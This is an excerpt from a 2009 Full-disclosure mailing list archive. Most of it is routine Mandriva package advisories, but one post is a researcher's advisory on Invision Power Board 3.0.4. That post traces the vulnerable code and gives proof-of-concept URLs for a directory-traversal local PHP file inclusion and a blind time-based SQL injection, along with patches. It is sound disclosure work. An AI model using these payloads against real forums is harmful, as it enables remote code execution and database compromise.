2008.0/i586/tkinter-apps-2.5.2-2.4mdv2008.0.i586.rpm 3073a21fea81d8057f02af09e1c18d28 2008.0/SRPMS/python-2.5.2-2.4mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: c6e53e252fde2114632fef291f75933f 2008.0/x86_64/lib64python2.5-2.5.2-2.4mdv2008.0.x86_64.rpm 0af7036a37c0233041403f9c92348a53 2008.0/x86_64/lib64python2.5-devel-2.5.2-2.4mdv2008.0.x86_64.rpm 46c8486c87a8c54f467ce63168c878a5 2008.0/x86_64/python-2.5.2-2.4mdv2008.0.x86_64.rpm 0b1407a7c3563ef4a248c705e2ba7d57 2008.0/x86_64/python-base-2.5.2-2.4mdv2008.0.x86_64.rpm 4c898fbaa2a089bc11d30b9ac9d7c42f 2008.0/x86_64/python-docs-2.5.2-2.4mdv2008.0.x86_64.rpm d09f93b33ceefa8db2077092822ef16f 2008.0/x86_64/tkinter-2.5.2-2.4mdv2008.0.x86_64.rpm a465678469faaedb9ecc4eb2ea881886 2008.0/x86_64/tkinter-apps-2.5.2-2.4mdv2008.0.x86_64.rpm 3073a21fea81d8057f02af09e1c18d28 2008.0/SRPMS/python-2.5.2-2.4mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGQximqjQ0CJFipgRAsDTAKCJuBG9dam3cR6p/6pZr+ByT6It+ACfaZf2 3DL1IYTZ4UAu83u00ATf3W8= =M4rz -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 17:07:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 18:07:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:218-1 ] w3c-libwww Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:218-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : w3c-libwww Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability was found in xmltok_impl.c (expat) that with specially crafted XML could be exploited and lead to a denial of service attack. Related to CVE-2009-2625 (CVE-2009-3720). This update fixes this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 https://bugs.gentoo.org/show_bug.cgi?id=280615 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 2a8e142af77be1b60a7ccd02e66dd587 2008.0/i586/w3c-libwww-5.4.0-8.1mdv2008.0.i586.rpm e4cbabf897c816d707e9092d8280b96f 2008.0/i586/w3c-libwww-apps-5.4.0-8.1mdv2008.0.i586.rpm 276f6ccca91a1ad06d6e0a40767323b9 2008.0/i586/w3c-libwww-devel-5.4.0-8.1mdv2008.0.i586.rpm 5fa864a2e952bfa86758b689302d5b89 2008.0/SRPMS/w3c-libwww-5.4.0-8.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: af3800898d3de92c9a01c0a6616c0e74 2008.0/x86_64/w3c-libwww-5.4.0-8.1mdv2008.0.x86_64.rpm eb4422f1e0a3f89e03ee1df985f634ce 2008.0/x86_64/w3c-libwww-apps-5.4.0-8.1mdv2008.0.x86_64.rpm 5a37706de7e38011f5efa43b5e7faed8 2008.0/x86_64/w3c-libwww-devel-5.4.0-8.1mdv2008.0.x86_64.rpm 5fa864a2e952bfa86758b689302d5b89 2008.0/SRPMS/w3c-libwww-5.4.0-8.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGRZHmqjQ0CJFipgRAmFRAJ4ojYOY6V7UNcwJ40p7B/ttaq62UQCgwMwn 4c8xhxDXSa0ONgxjFi38mlY= =0JUz -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 17:37:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 18:37:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:315 ] libneon Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:315 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libneon Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in libneo: neon before 0.28.6, when OpenSSL is used, does not properly handle a '\0' (NUL) character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408 (CVE-2009-2474). Packages for 2008.0 are being provided due to extended support for Corporate products. This update provides a solution to these vulnerabilities. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2474 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 740b480f6328003b8014400e7c722484 2008.0/i586/libneon0.24-0.24.7-19.1mdv2008.0.i586.rpm 43b99ccadcf192c0dcf9fe7c3827fb4e 2008.0/i586/libneon0.24-devel-0.24.7-19.1mdv2008.0.i586.rpm fffad63f0bbd21bf217e31970897a870 2008.0/i586/libneon0.24-static-devel-0.24.7-19.1mdv2008.0.i586.rpm c924d144718465c821feead5dcf518f9 2008.0/i586/libneon0.26-0.26.4-2.1mdv2008.0.i586.rpm aab2432e0e0a6c9a8cf774e0543a5a5d 2008.0/i586/libneon0.26-devel-0.26.4-2.1mdv2008.0.i586.rpm feece8652a4b373e0faa9b5e19219375 2008.0/i586/libneon0.26-static-devel-0.26.4-2.1mdv2008.0.i586.rpm 3be15e1a506e2b7db1f54f81eb2f6dae 2008.0/SRPMS/libneon0.24-0.24.7-19.1mdv2008.0.src.rpm 497eeb18ab24c0db911d3a20467d1d2a 2008.0/SRPMS/libneon0.26-0.26.4-2.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: dc55c69b3ae59becec04e4eb7c2f006d 2008.0/x86_64/lib64neon0.24-0.24.7-19.1mdv2008.0.x86_64.rpm e0a0c506088e59c58e51e27dfd5914b0 2008.0/x86_64/lib64neon0.24-devel-0.24.7-19.1mdv2008.0.x86_64.rpm c3d17f64c10f3b0390f39c319eabd20d 2008.0/x86_64/lib64neon0.24-static-devel-0.24.7-19.1mdv2008.0.x86_64.rpm 88b416621021d1fe74d51fc112687867 2008.0/x86_64/lib64neon0.26-0.26.4-2.1mdv2008.0.x86_64.rpm a5698628bf4e501d5a7cb0c97db0c9ff 2008.0/x86_64/lib64neon0.26-devel-0.26.4-2.1mdv2008.0.x86_64.rpm 5be57578b426ca6650fb37628e15298c 2008.0/x86_64/lib64neon0.26-static-devel-0.26.4-2.1mdv2008.0.x86_64.rpm 3be15e1a506e2b7db1f54f81eb2f6dae 2008.0/SRPMS/libneon0.24-0.24.7-19.1mdv2008.0.src.rpm 497eeb18ab24c0db911d3a20467d1d2a 2008.0/SRPMS/libneon0.26-0.26.4-2.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGR24mqjQ0CJFipgRAgx9AJ9Q3zLtxSaT7O4AGs2ha68RRyqbDACgycd+ yUGSZmbEVJOvIRBjUK5nzPc= =q5pl -----END PGP SIGNATURE----- From golunski at onet.eu Fri Dec 4 17:26:16 2009 From: golunski at onet.eu (Dawid Golunski) Date: Fri, 4 Dec 2009 17:26:16 +0000 Subject: [Full-disclosure] Invision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection Message-ID: ============================================= - Release date: December 4th, 2009 - Discovered by: Dawid Golunski - Severity: Moderately High ============================================= I. VULNERABILITY ------------------------- Invision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection Invision Power Board <= 2.3.6 SQL Injection II. BACKGROUND ------------------------- Invision Power Board (IPB) is a professional forum system that has been built from the ground up with speed and security in mind, taking advantage of object oriented code, highly-optimized SQL queries, and the fast PHP engine. A comprehensive administration control panel is included to help you keep your board running smoothly. Moderators will also enjoy the full range of options available to them via built-in tools and moderators control panel. Members will appreciate the ability to subscribe to topics, send private messages, and perform a host of other options through the user control panel. III. INTRODUCTION ------------------------- For a good understanding of the vulnerabilities it is necessary to be familiar with the way IPB handles input data. Below is a quick trace of input validation process. The code snippets come from IPB version 3.0.4. line | file: admin/sources/base/ipsRegistry.php 352 | static public function init() 353 | { ... | ... | 462 | IPSLib::cleanGlobals( $_GET ); 463 | IPSLib::cleanGlobals( $_POST ); 464 | IPSLib::cleanGlobals( $_COOKIE ); 465 | IPSLib::cleanGlobals( $_REQUEST ); 466 | 467 | # GET first 468 | $input = IPSLib::parseIncomingRecursively( $_GET, array() ); 469 | 470 | # Then overwrite with POST 471 | self::$request = IPSLib::parseIncomingRecursively( $_POST, $input ); ... | The init() function cleans the input data passed via methods like GET, POST or others at the start of each request to the forum before any of the input variables are processed. Let's look into sanitization performed by cleanGlobals function: line | file: admin/sources/base/core.php 1644 | static public function cleanGlobals( &$data, $iteration = 0 ) 1645 | { ... | 1654 | foreach( $data as $k => $v ) 1655 | { 1656 | if ( is_array( $v ) ) 1657 | { 1658 | self::cleanGlobals( $data[ $k ], ++ $iteration ); 1659 | } 1660 | else 1661 | { 1662 | # Null byte characters 1663 | $v = str_replace( chr('0') , '', $v ); 1664 | $v = str_replace( "\0" , '', $v ); 1665 | $v = str_replace( "\x00" , '', $v ); 1666 | $v = str_replace( '%00' , '', $v ); 1667 | 1668 | # File traversal 1669 | $v = str_replace( "../", "../", $v ); 1670 | 1671 | $data[ $k ] = $v; 1672 | } 1673 | } 1674 | } As we can see the function removes null characters and "../" sequences from incoming data to prevent unwanted file inclusion. The next function that affects the input is: line | file: admin/sources/base/core.php 1573 | static public function parseIncomingRecursively( &$data, $input=array(), $iteration = 0 ) 1574 | { ... | 1583 | foreach( $data as $k => $v ) 1584 | { 1585 | if ( is_array( $v ) ) 1586 | { 1587 | $input[ $k ] = self::parseIncomingRecursively( $data[ $k ], array(), ++$iteration ); 1588 | } 1589 | else 1590 | { 1591 | $k = IPSText::parseCleanKey( $k ); 1592 | $v = IPSText::parseCleanValue( $v, false ); 1593 | 1594 | $input[ $k ] = $v; 1595 | } 1596 | } 1597 | 1598 | return $input; 1599 | } The purpose of this function is to clean the key/value pairs of an array passed to it with help of the parseCleanKey and parseCleanValue functions. The first one can be skipped as neither of the attacks described later on require special characters inside variable names. The other looks as follows: line | file: admin/sources/base/core.php 4100 | static public function parseCleanValue( $val, $postParse=true ) 4101 | { 4102 | if ( $val == "" ) 4103 | { 4104 | return ""; 4105 | } 4106 | 4107 | $val = str_replace( " ", " ", IPSText::stripslashes($val) ); 4108 | 4109 | # Convert all carriage return combos 4110 | $val = str_replace( array( "\r\n", "\n\r", "\r" ), "\n", $val ); 4111 | 4112 | $val = str_replace( "&", "&", $val ); 4113 | $val = str_replace( "", "-->", $val ); 4115 | $val = str_ireplace( "", ">", $val ); 4117 | $val = str_replace( "<", "<", $val ); 4118 | $val = str_replace( '"', """, $val ); 4119 | $val = str_replace( "\n", "
", $val ); // Convert literal newlines 4120 | $val = str_replace( "$", "$", $val ); 4121 | $val = str_replace( "!", "!", $val ); 4122 | $val = str_replace( "'", "'", $val ); // IMPORTANT: It helps to increase sql query safety. 4123 | 4124 | if ( IPS_ALLOW_UNICODE ) ... | The function cleans input data from characters used typically in XSS and SQL attacks. The resulting array containing sanitized input data from GET/POST methods is stored in ipsRegistry::$request array (as we can see on the first code listing). IV. LOCAL FILE INCLUSION VULNERABILITY ------------------------- 1. Description. It is possible to include an arbitrary php file stored on the server in any location (accessible by the php/web server process) by exploiting the following code of IPB 3.0.4: line | file: admin/sources/base/ipsController.php 142 |public function getCommand( ipsRegistry $registry ) 143 |{ 144 | $_NOW = IPSDebug::getMemoryDebugFlag(); 145 | 146 | $module = ipsRegistry::$current_module; 147 | $section = ipsRegistry::$current_section; 148 | $filepath = IPSLib::getAppDir( IPS_APP_COMPONENT ) . '/' . self::$modules_dir . '/' . $module . '/'; 149 | 150 | /* Got a section? */ 151 | if ( ! $section ) 152 | { 153 | if ( file_exists( $filepath . 'defaultSection.php' ) ) 154 | { 155 | $DEFAULT_SECTION = ''; 156 | require( $filepath . 'defaultSection.php' ); 157 | 158 | if ( $DEFAULT_SECTION ) 159 | { 160 | $section = $DEFAULT_SECTION; 161 | } 162 | } 163 | } 164 | 165 | $classname = self::$class_dir . '_' . IPS_APP_COMPONENT . '_' . $module . '_' . $section; 166 | 167 | if ( file_exists( $filepath . 'manualResolver.php' ) ) 168 | { 169 | require_once( $filepath . 'manualResolver.php' ); 170 | $classname = self::$class_dir . '_' . IPS_APP_COMPONENT . '_' . $module . '_manualResolver'; 171 | } 172 | else if ( file_exists( $filepath . $section . '.php' ) ) 173 | { 174 | require_once( $filepath . $section . '.php' ); 175 | } ... | The require_once function on line 174 uses a variable $section to create a path to a php file that is to be included. The variable is assigned the following value: line | file: admin/sources/base/ipsRegistry.php 1654 | ipsRegistry::$current_section = ( ipsRegistry:: $request['section'] ) ? ipsRegistry::$request['section'] : ''; which as we know from the introduction comes from a user supplied variable (via GET or POST method). Although the whole $request array has been filtered out to prevent directory traversal and arbitrary file inclusion it is possible to evade these measures due to a bug in a function implementing the "friendly URLs" feature introduced in version 3.0.0 of the IPB forum. line | file: admin/sources/base/ipsRegistry.php 1188 | private static function _fUrlInit() 1189 | { ... | 1195 | if ( ipsRegistry::$settings['use_friendly_urls'] ) 1196 | { ... | ... | 1235 | $uri = $_SERVER['REQUEST_URI'] ? $_SERVER['REQUEST_URI'] : @getenv('REQUEST_URI'); 1236 | 1237 | $_toTest = $uri; //( $qs ) ? $qs : $uri; ... | ... | ... | 1306 | //----------------------------------------- 1307 | // If using query string furl, extract any 1308 | // secondary query string. 1309 | // Ex: http://localhost/index.php?/path/file.html? key=value 1310 | // Will pull the key=value properly 1311 | //----------------------------------------- 1312 | 1313 | if( substr_count( $_toTest, '?' ) > 1 ) 1314 | { 1315 | $_secondQueryString = substr( $_toTest, strrpos( $_toTest, '?' ) + 1 ); 1316 | $_secondParams = explode( '&', $_secondQueryString ); 1317 | 1318 | if( count($_secondParams) ) 1319 | { 1320 | foreach( $_secondParams as $_param ) 1321 | { 1322 | list( $k, $v ) = explode( '=', $_param ); 1323 | 1324 | $k = IPSText::parseCleanKey( $k ); 1325 | $v = IPSText::parseCleanValue( $v ); 1326 | 1327 | $_GET[ $k ] = $v; 1328 | $_REQUEST[ $k ] = $v; 1329 | $_urlBits[ $k ] = $v; 1330 | 1331 | ipsRegistry::$request[ $k ] = $v; 1332 | } 1333 | } 1334 | } 1335 | } ... | The above code allows for a secondary query string from which additional variables are retrieved and saved in the $request array as well as $_GET and $_REQUEST globals. It takes a query string from a previously not cleaned global: $_SERVER['REQUEST_URI'] and fails to check if the variables supplied in the request URI string already exist in any of the arrays as well as to call cleanGlobals function to sanitize the values. A variable named 'section' can be passed in the secondary query string in order to bypass filtration of "../" and %00 sequences, effectively allowing to traverse directories and include any given php file within the system leading to a local file inclusion attack. Note: Omitting '.php' extension (to include arbitrary file like /etc/ passwd) by using a NULL character will not be possible in this case as a combination of %00 in the REQUEST_URI will not get decoded by the web server automatically and there is no urldecode function to decode it before the require_once call either. Versions older than 3.0.4 have a different implementation of the friendly url feature, but are also vulnerable in the same way. 2. Proof of concept. This issue is trivial to exploit with a web browser and a known location of a php file residing on the target system. Authorisation is not required. For example, the following URL in case of IPB 3.0.4: http://server-with-ipb-forum-3.0.4.com/forum/index.php?app=core&module=global§ion=register&any= ? section = ../../../../../../../../../../../../../../../../../../../../../../../../../../tmp /inc or the following in case of versions older than IPB 3.0.4: http://server-with-ipb-forum-3.0.[0-3].com/forum/index.php? app=core&module=global§ion=register/register/ page__section__ ../../../../../../../../../../../../../../../../../../../../../tmp/inc__ will result in including /tmp/inc.php file and executing code it contains. V. SQL INJECTION VULNERABILITY ------------------------- 1. Description. An SQL Injection attack is possible due to an insufficient sanitization in the following function: line | file: admin/applications/forums/sources/classes/moderate.php 1820 | /** 1821 | * Create 'where' clause for SQL forum pruning 1822 | * 1823 | * @access public 1824 | * @return boolean 1825 | */ 1826 | public function sqlPruneCreate( $forum_id, $starter_id="", $topic_state="", $post_min="", $date_exp="", $ignore_pin="" ) 1827 | { 1828 | $sql = 'forum_id=' . intval($forum_id); 1829 | 1830 | if ( intval($date_exp) ) 1831 | { 1832 | $sql .= " AND last_post < {$date_exp}"; 1833 | } 1834 | 1835 | if ( intval($starter_id) ) 1836 | { 1837 | $sql .= " AND starter_id={$starter_id}"; 1838 | 1839 | } 1840 | 1841 | if ( intval($post_min) ) 1842 | { 1843 | $sql .= " AND posts < {$post_min}"; 1844 | } 1845 | 1846 | if ($topic_state != 'all') 1847 | { 1848 | if ($topic_state) 1849 | { 1850 | $sql .= " AND state='{$topic_state}'"; 1851 | } 1852 | } 1853 | 1854 | if ( $ignore_pin != "" ) 1855 | { 1856 | $sql .= " AND pinned=0"; 1857 | } 1858 | 1859 | 1860 | return $sql; 1861 | } All of the IF statements with intval() are to ensure that the arguments passed to the function are numeric before they are placed inside a WHERE clause of a query. Because of the way that intval() works, it is possible to fool the function by passing a string like: '1 OR sleep(5) '. In such case intval() will return a value of 1 thus satisfying the IF conditions and causing the string to be placed inside the query. The sqlPruneCreate function is used 2 times in a code that performs some moderator's tasks. One invocation of it can be found in: line | file: admin/applications/forums/modules_public/moderate/ moderate.php 2323 | protected function _pruneMove() 2324 | { 2325 | //----------------------------------------- 2326 | // Check 2327 | //----------------------------------------- 2328 | 2329 | $this->_resetModerator( $this->topic['forum_id'] ); 2330 | 2331 | $this->_genericPermissionCheck( 'mass_move' ); 2332 | 2333 | ///----------------------------------------- 2334 | // SET UP 2335 | //----------------------------------------- 2336 | 2337 | $pergo = intval( $this->request['pergo'] ) ? intval( $this->request['pergo'] ) : 50; 2338 | $max = intval( $this->request['max'] ); 2339 | $current = intval($this->request['current']); 2340 | $maxdone = $pergo + $current; 2341 | $tid_array = array(); 2342 | $starter = trim( $this->request['starter'] ); 2343 | $state = trim( $this->request['state'] ); 2344 | $posts = intval( $this->request['posts'] ); 2345 | $dateline = intval( $this->request['dateline'] ); 2346 | $source = $this->forum['id']; 2347 | $moveto = intval($this->request['df']); 2348 | $date = 0; 2349 | $ignore_pin = intval( $this->request['ignore_pin'] ); 2350 | 2351 | if( $dateline ) 2352 | { 2353 | $date = time() - $dateline*60*60*24; 2354 | } 2355 | 2356 | //----------------------------------------- 2357 | // Carry on... 2358 | //----------------------------------------- 2359 | 2360 | $dbPruneWhere = $this->modLibrary->sqlPruneCreate( $this- >forum['id'], $starter, $state, $posts, $date, $ignore_pin ); 2361 | 2362 | $this->DB->build( array( 2363 | 'select' => 'tid', 2364 | 'from' => 'topics', 2365 | 'where' => $dbPruneWhere, 2366 | 'limit' => array( 0, $pergo ), 2367 | ) ); 2368 | $batch = $this->DB->execute(); ... | As we can see there are 2 variables that come from a user and are not converted to a number before they are passed to the sqlPruneCreate function: $starter and $state. The second variable cannot be used in SQL Injection as it will be treated as a string and embraced with quotes by sqlPruneCreate. A string passed in $starter variable will be placed unquoted in the query as long as the first character is a number allowing a logged in moderator to perform an SQL Injection attack. The vulnerability is somewhat tricky to exploit as there are quite a few restrictions that make creating a successful sql attack vector difficult. Only the WHERE statement can be controlled, quotes are filtered, and UNION or sub selects are prohibited too (at least in case of a MySQL driver). To top it all, the results of the query are not outputted to the browser so it will have to be a blind injection. Nevertheless a crafty attacker might issue a series of requests that might allow him to gain some information about the target system or even read files from the disk depending on permissions granted to the db account that is used by the forum. Other attacks might also be possible when a database engine other than MySQL is used. 2. Proof of concept. If a logged in user with moderator privileges requests an URL like: http://server-with-ipb-3.x.x-forum.com/forum/?app=forums&module=moderate§ion=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20--%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd in case of IPB 3.x, or: http://server-with-ipb-2.x.x-forum.com/forum/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(16)%20--%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c in case of IPB 2.x. A query similar to: SELECT tid FROM ibftopics WHERE forum_id=1 AND starter_id=1 AND starter_id=1 OR substr(version(),1,1)=5 AND sleep(15) -- skip AND state='open' AND pinned=0 LIMIT 0,50 will be run against the database. The query will check if a major version of MySQL server is equal to 5. If that is the case a sleep function will be run which will slow down the page load by 15 seconds thus revealing the result of the query. For this to work a valid auth_key needs to be supplied (that can be obtained by going to any of the forums, clicking Forum Management button and selecting Prune/Mass Move feature). Source ($f) and Destination ($df) forums parameters in the URL might also need adjusting. VI. BUSINESS IMPACT ------------------------- The Local PHP File Inclusion vulnerability can be especially dangerous in a shared hosting environment. Even if server has been configured to prevent users from reading each other's document roots (web server/PHP process running in a context of the site's owner), an attacker that has an account on the same server as the targeted site could use the vulnerability to place a php file in a shared directory like /tmp and cause the IPB forum on the target to execute his code thus gaining access equivalent to the owner of the website. The SQL Injection vulnerability is only a threat in case there are moderators on the forum that cannot be fully trusted or if an attacker manages to steal/guess their passwords. Possible risks in case of a successful exploitation of this flaw have been described in the previous section. VII. SYSTEMS AFFECTED ------------------------- All of the IPB versions of the 3.x series (including the newest release of 3.0.4) are affected by the Local PHP File Inclusion and SQL Injection vulnerabilities. Probably most if not all of IPB releases of the 2.x series (including 2.3.6) are affected by the SQL Injection vulnerability. VIII. SOLUTION ------------------------- Vendor has been informed about the vulnerabilities and should be releasing patches soon. I attach 2 patches for the current versions of both 2.x and 3.x series that can be used as a temporary solution. IPB 3.0.4 patch: diff -Nprub ipb304/admin/applications/forums/sources/classes/ moderate.php ipb304-patched/admin/applications/forums/sources/classes/ moderate.php --- ipb304/admin/applications/forums/sources/classes/moderate.php 2009-10-08 16:34:50.000000000 +0100 +++ ipb304-patched/admin/applications/forums/sources/classes/ moderate.php 2009-11-29 01:01:49.000000000 +0000 @@ -1829,18 +1829,18 @@ class moderatorLibrary if ( intval($date_exp) ) { - $sql .= " AND last_post < {$date_exp}"; + $sql .= " AND last_post < ". intval($date_exp); } if ( intval($starter_id) ) { - $sql .= " AND starter_id={$starter_id}"; + $sql .= " AND starter_id=". intval($starter_id); } if ( intval($post_min) ) { - $sql .= " AND posts < {$post_min}"; + $sql .= " AND posts < ". intval($post_min); } if ($topic_state != 'all') diff -Nprub ipb304/admin/sources/base/ipsRegistry.php ipb304-patched/ admin/sources/base/ipsRegistry.php --- ipb304/admin/sources/base/ipsRegistry.php 2009-10-08 16:34:24.000000000 +0100 +++ ipb304-patched/admin/sources/base/ipsRegistry.php 2009-11-29 00:57:13.000000000 +0000 @@ -479,6 +479,9 @@ class ipsRegistry /* First pass of app set up. Needs to be BEFORE caches and member are set up */ self::_fUrlInit(); + IPSLib::cleanGlobals( $_GET ); + IPSLib::cleanGlobals( $_REQUEST ); + IPSLib::cleanGlobals( self::$request ); self::_manageIncomingURLs(); IPB 2.3.6 patch: diff -Nprub ipb236/sources/lib/func_mod.php ipb236-patched/sources/lib/ func_mod.php --- ipb236/sources/lib/func_mod.php 2009-11-29 01:10:13.000000000 +0000 +++ ipb236-patched/sources/lib/func_mod.php 2009-11-29 01:19:23.000000000 +0000 @@ -1219,18 +1219,18 @@ class func_mod if ( intval($date_exp) ) { - $sql .= " AND last_post < $date_exp"; + $sql .= " AND last_post < ". intval($date_exp); } if ( intval($starter_id) ) { - $sql .= " AND starter_id=$starter_id"; + $sql .= " AND starter_id=". intval($starter_id); } if ( intval($post_min) ) { - $sql .= " AND posts < $post_min"; + $sql .= " AND posts < ". intval($post_min); } if ($topic_state != 'all') Apply by going to your forum's directory and running the command: patch -p1 < path_to_the_patch IX. REFERENCES ------------------------- http://www.invisionpower.com/products/board/ X. CREDITS ------------------------- The vulnerabilities have been discovered by Dawid Golunski golunski (at) onet (dot) eu XI. REVISION HISTORY ------------------------- December 4th, 2009: Initial release XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. From security at mandriva.com Fri Dec 4 18:00:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 19:00:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:223-1 ] xerces-c Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:223-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : xerces-c Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in xerces-c: Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in simply nested DTD structures, as demonstrated by the Codenomicon XML fuzzing framework (CVE-2009-1885). This update provides a solution to this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1885 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 72383b750cd16274f52f35049b3a5e47 2008.0/i586/libxerces-c0-2.7.0-5.1mdv2008.0.i586.rpm e9d2b47d1fb94e748f0e4a2cb9e95e46 2008.0/i586/libxerces-c0-devel-2.7.0-5.1mdv2008.0.i586.rpm 7d5369e7a62d47aaab0363f24ca05775 2008.0/i586/xerces-c-doc-2.7.0-5.1mdv2008.0.i586.rpm a98ebaaa3a3243fa337eb37de135e918 2008.0/SRPMS/xerces-c-2.7.0-5.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 9ee8f7ee2778a4c2ece40416df246be9 2008.0/x86_64/lib64xerces-c0-2.7.0-5.1mdv2008.0.x86_64.rpm 38c61e60b68009bcd740e1f3a6d6c0ab 2008.0/x86_64/lib64xerces-c0-devel-2.7.0-5.1mdv2008.0.x86_64.rpm 7e9bd01041e3548333c1750825a1a469 2008.0/x86_64/xerces-c-doc-2.7.0-5.1mdv2008.0.x86_64.rpm a98ebaaa3a3243fa337eb37de135e918 2008.0/SRPMS/xerces-c-2.7.0-5.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGSLemqjQ0CJFipgRAsDaAJ0YGPXszEfUEXjEIVg2n6vSRHbkIQCfTzUZ uM8xO/P9YJLe3JfpyIsXEII= =/W5u -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 4 19:53:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Dec 2009 20:53:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:224-1 ] postfix Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:224-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : postfix Date : December 4, 2009 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in postfix: Postfix 2.5 before 2.5.4 and 2.6 before 2.6-20080814 delivers to a mailbox file even when this file is not owned by the recipient, which allows local users to read e-mail messages by creating a mailbox file corresponding to another user's account name (CVE-2008-2937). This update provides a solution to this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2937 